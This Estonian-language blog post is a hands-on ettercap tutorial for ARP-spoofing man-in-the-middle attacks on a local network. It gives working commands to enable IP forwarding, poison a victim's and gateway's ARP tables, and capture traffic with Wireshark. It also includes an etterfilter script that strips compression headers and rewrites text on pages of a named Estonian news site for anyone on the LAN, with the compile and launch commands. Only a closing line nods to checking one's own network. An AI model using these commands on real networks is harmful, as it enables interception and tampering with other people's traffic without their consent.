ettercap February 16, 2007 at 6:12 pm
Ettercap http://ettercap.sourceforge.net/) on üks mega-power-tool ja niisama ajaviitmise riist ka. Siinkohal hakkan seda ise natuke lahkama ja panen siia siis kirja kuidas läheb. Aeg on näidanud et kui mingi asjaga ikka pidevalt ei tegele siis lähed rooste. Samas kui on kusagilt väga lihtsad näited võtta siis võib ka roostes ollas tuusa mulje jätta 
* ettercap -P list – peaks andma kasutatavate pluginate listi
* ettercap -Tq -i [interface]-M arp:remote // – kogu LAN. Suurema kohtvõrgu puhul ei pruugi teie võrgukaart piisav olla. Kui soovi kindel grupp koosatada siis saab seda määrata /192.168.0.1(gw),100(victim1)/ – antud juhul olete 192.168.0.1 ja 192.168.0.100 liikluse vahel.
Võtame siis esimese ja kõige karmima case. LAN peal MITMA (Man In The Middle Attac)
Enne kui ilmusid switchid oli asi lihtne. Kõike pakette karjuti terve võrgu peale. Nüüd larjutakse kogu võrgule vähe, kuid siiski. Üks neist on ARP päringud. Kuna ARP toimib LAN peal siis ei peeta seda kuigi ohtlikuks. KUID!!! Tuleb teie kontorise klient ja soovib oma sülearvuti panna teie sisevõrku ja kogub umbes 1h jooksul kõik liikluse oma arvutisse. Hiljem siis kodus analüüsib seda ja… edasi te ei taha teada.
Kuidas ta seda siis teeb.
LINUX: echo 1 > /proc/sys/net/ipv4/ip_forward BSD: sysctl -w net.inet.ip.forwarding=1
- Seda selleks et liiklus arvutisse pidama ei jääks.
ettercap -o -T -P repoison_arp -M arp:remote /VIGTIM IP/ /GW IP/
Mis iganes on vahepeal arenenud (29.05.2008) aga MAX OS X 10.5 ja port pealt kokku lastud ettercap pelab siin: ettercap -a -i en(n) victimIP GW-IP. Kõrvale wireshark käima ja oled kohe terve LAN-i hirm ja kunn.
Mis siis toimub. LAN peal on switchides ja arvutites ARP tabelid kus on kirjas IP aadress ja MAC aadress. Kui nüüd mingi paket LAN peal liigub siis paketi sees on src IP ja target IP masinad siis võrdlevad ARP tablelitest kuhu MACi peale seda saata. Kuna aga ARPi võivad LAN peal saata kõik siis võib häkker karjuda LAN peale et tema mac on GW mac. Sellest piisab et kogu liiklus või siis vastava arvuti liiklus käib läbi häkkeri arvuti.
—
etterfilter - Päris põnev mänguasi millega saad mõjutada enda käes olevat liiklust.
Võtame lehe www.delfi.ee
avame tekstieditori ja kirjutame sinna:
# Kuna veebiserverid saadavad vastuseid pakitult ja meie ei soovi seda siis lihtsalt saadame serverile suvalise encodingu, peaasi et sama pika. Nüüd peaksime vastu puhast teksit saama
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
# antud osa on juba igaühe enda teha. Siin lihtsalt näide.
if (ip.proto == TCP && tcp.src == 80) {
replace(“Loe”, “Jipikajee mader fakker”);
msg(“Filter Ran.\n”);
}
Kompileerime:
etterfilter delfi.filter -o delfi.ef
ja käivitame rünnaku:
ettercap -i en1 -T -q -F delfi.ef -M ARP // või /192.168.0.1(gw),100(victim 192.168.0.100)
Kui nüüd kõik kenasti laabus, seal on veel omad nipid ja nõksud, vahel peab root kasutaja alt tegema või siis vajalikes kohas vajalikud õigused, igatahes kui nüüd sama LAN-i peale keegi www.delfi.ee peale satub siis võib ta seal Loe asemel suht naljakat asja kohata.
See oli lihtsalt näide. Antud lõik ei kutsu kuidagi delfi.ee maha tegema vaid oli suvaline näide.
Kui sina võid seda teha siis võib seda ükskõik kes. Seega kontrolli kas võrk on puhas sinusugustest.
* ettercap -c -N
* ettercap -l -N annab hea ülevaate võrgus asuvate masinate IP-de ja MAC aadressidest.
Leave a Reply
You must be logged in to post a comment.